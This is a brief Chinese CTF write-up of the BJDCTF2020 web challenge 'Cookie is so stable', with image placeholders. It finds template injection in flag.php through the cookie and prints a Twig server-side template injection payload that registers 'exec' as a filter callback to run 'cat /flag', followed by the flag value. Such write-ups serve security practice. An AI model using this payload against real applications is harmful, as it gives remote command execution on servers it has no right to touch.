[BJDCTF2020] web题-Cookie is so stable

[BJDCTF2020] web题-Cookie is so stable_第1张图片

酷炫的欢迎界面,有1个flag.php和hint.php
hint.php的页面元素发现了提示
[BJDCTF2020] web题-Cookie is so stable_第2张图片
去flag.php发现存在模板注入
[BJDCTF2020] web题-Cookie is so stable_第3张图片
然后提示说研究cookie,使用payload
payload:{ {_self.env.registerUndefinedFilterCallback(“exec”)}}{ {_self.env.getFilter(“cat /flag”)}};
[BJDCTF2020] web题-Cookie is so stable_第4张图片
flag:flag{985a0930-71c5-4a1a-9b7e-229400ecab55}

你可能感兴趣的:(CTF练习)